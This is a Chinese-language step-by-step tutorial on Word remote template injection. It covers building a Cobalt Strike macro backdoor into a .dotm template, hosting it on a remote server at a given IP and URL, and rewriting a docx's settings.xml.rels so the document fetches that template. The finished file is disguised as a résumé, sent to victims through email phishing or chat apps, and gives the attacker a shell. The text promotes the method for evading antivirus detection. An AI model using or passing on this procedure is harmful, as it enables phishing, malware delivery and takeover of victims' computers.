0x00 前言
利用Word文檔加載附加模板時的缺陷所發起的惡意請求而達到的攻擊目的,所以當目標用戶點開攻擊者發給他的惡意word文檔就可以通過向遠程服務器請求惡意模板並執行惡意模板上的惡意代碼。
這里,我們借助CobaltStrike生成office宏病毒,在將惡意宏嵌入到Word模板中,誘使受害者遠程打開並加載帶有宏的惡意Word模版,至目標主機成功上線CobaltStrike。
缺點:目標主機的網速決定了加載遠程模版的速度。有可能文件打開的會特別慢(例如將遠程模版放在github),受害者可能在文件打開一半的時候強制關閉word。加載位於github上的惡意模板內容,有點慢,我們可以放在vps上,這樣速度就快些了。
優點:因為是遠程加載,所以免殺效果十分不錯。基本不會被殺毒軟件攔截。
0x01 操作演示
第一步:制作一個惡意的模版並確保能夠上線
這里以cs的宏木馬為例。
依次點擊攻擊——>生成后門——>MS Office Macro:
然后選擇一個監聽器,點擊Generate:
然后點擊Copy Macro:
此時便將惡意的VB代碼獲取到了剪切板中。
然后打開word編輯器,在工具欄的空白區域右鍵,點擊自定義功能區:
勾選開發工具選項:
此時就會出現開發工具這一欄,並點擊開發工具中的“Visual basic”:
將惡意代碼復制到project的指定地點如下圖所示:
然后保存關閉代碼框,將這個word文件另存為一個啟用宏的word模版文件(*.dotm):
這時候可以先測試一下模版能否上線,操作為在模版文件上右鍵打開,雙擊是無法打開模版文件的,在模版文件上雙擊默認是以此模版創建新文件,切記。
右鍵打開后,CS成功上線:
第二步:制作遠程加載惡意宏模版的docx文件
1.將惡意文件上傳到服務器
首先將剛才已經制作好的含有惡意代碼的模版文件上傳到服務器上
開啟監聽,並在url后面加上?raw=true
http://22.124.56.238:8999/Doc1.dotm?raw=true
2.加載服務器上的惡意文件
打開word找一個任意的模版雙擊使用
將文件后綴改為zip
將其解壓縮:
進入word文件夾中的_rels,找到settings.xml.rels文件
編輯這個文件,將其的target屬性的值改為我們上面的那個url,也就是http://22.124.56.238:8999/Doc1.dotm?raw=true
接下來將剛才解壓生成的文件壓縮回去:
並且將生成的壓縮文件改名為后綴名為docx的文件。
將最終生成的惡意文件——我的簡歷.docx用郵箱釣魚、qq或微信文件發送給受害者,當受害者雙擊打開“我的簡歷.docx”文件是,惡意代碼會執行,目標主機會上線
火絨查殺,並未發現
注意:將該惡意文檔發給其他人,只要他是用word打開(wps不行),並且開啟了宏,我們的CS就會收到彈回來的shell。
word開啟或禁用宏:文件——>選項——>信任中心——>信任中心設置
默認情況下是“禁用所有宏,並發出通知”,這種情況下,當我們打開惡意文件時,會詢問你是否“啟用內容”:
這時,受害者只有點擊了“啟用內容”后惡意代碼才會執行,目標主機才能上線(當然對方主機如果安裝了殺軟,如果進行注入,殺軟會進行動態查殺,惡意文件將不會起作用)。